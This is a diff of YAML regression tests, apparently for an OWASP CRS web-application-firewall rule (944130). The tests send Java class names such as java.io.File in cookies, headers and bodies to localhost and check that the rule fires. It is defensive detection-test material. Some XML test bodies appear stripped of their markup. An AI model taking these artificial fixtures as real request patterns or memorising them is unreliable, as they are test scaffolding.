- stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.CharArrayReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-70 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + Cookie: test=java.io.CharArrayReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 70 desc: "Cookie name includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.CharArrayReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-71 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.CharArrayReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 71 desc: "Request header test includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.CharArrayReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-72 + - input: + dest_addr: "127.0.0.1" + port: 80 + 
headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.CharArrayReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 72 desc: "XML attribute value includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-73 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 73 desc: "XML element value includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.CharArrayReader" - 
output: - log_contains: "id \"944130\"" - - test_title: 944130-74 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.CharArrayReader" + output: + log_contains: "id \"944130\"" + - test_id: 74 desc: "Nested XML element value includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.CharArrayReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-75 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.CharArrayReader" + output: + log_contains: "id \"944130\"" + - test_id: 75 desc: "Content-Type text/plain includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.CharArrayReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-76 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.CharArrayReader" + output: + log_contains: "id \"944130\"" + - test_id: 76 desc: "Content-Type application/json arg value includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.CharArrayReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-77 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.CharArrayReader\"}" + output: + log_contains: "id \"944130\"" + - test_id: 77 desc: "Content-Type application/json arg name includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.CharArrayReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-78 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.CharArrayReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 78 desc: "Argument test includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.DataInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-79 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.DataInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 79 desc: "Argument name includes 
keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.DataInputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-80 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.DataInputStream=test" + output: + log_contains: "id \"944130\"" + - test_id: 80 desc: "Cookie test includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.DataInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-81 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + Cookie: test=java.io.DataInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 81 desc: "Cookie name includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.DataInputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-82 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.DataInputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 82 desc: "Request header test includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.DataInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-83 + - input: + dest_addr: "127.0.0.1" + port: 80 + 
headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.DataInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 83 desc: "XML attribute value includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-84 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 84 desc: "XML element value includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.DataInputStream" - 
output: - log_contains: "id \"944130\"" - - test_title: 944130-85 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.DataInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 85 desc: "Nested XML element value includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.DataInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-86 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.DataInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 86 desc: "Content-Type text/plain includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.DataInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-87 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.DataInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 87 desc: "Content-Type application/json arg value includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.DataInputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-88 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.DataInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_id: 88 desc: "Content-Type application/json arg name includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.DataInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-89 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.DataInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 89 desc: "Argument test includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.File" - output: - log_contains: "id \"944130\"" - - test_title: 944130-90 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.File" + output: + log_contains: "id \"944130\"" + - test_id: 90 desc: "Argument name includes keyword java.io.File" stages: - - 
stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.File=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-91 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.File=test" + output: + log_contains: "id \"944130\"" + - test_id: 91 desc: "Cookie test includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.File - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-92 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.File + method: "POST" + uri: "/post" + version: 
"HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 92 desc: "Cookie name includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.File=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-93 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.File=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 93 desc: "Request header test includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.File - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-94 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.File + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 94 desc: "XML attribute value includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-95 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 95 desc: "XML element value includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.File" - output: - log_contains: "id \"944130\"" - - test_title: 944130-96 + - input: + dest_addr: "127.0.0.1" + port: 80 + 
headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.File" + output: + log_contains: "id \"944130\"" + - test_id: 96 desc: "Nested XML element value includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.File" - output: - log_contains: "id \"944130\"" - - test_title: 944130-97 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.File" + output: + log_contains: "id \"944130\"" + - test_id: 97 desc: "Content-Type text/plain includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 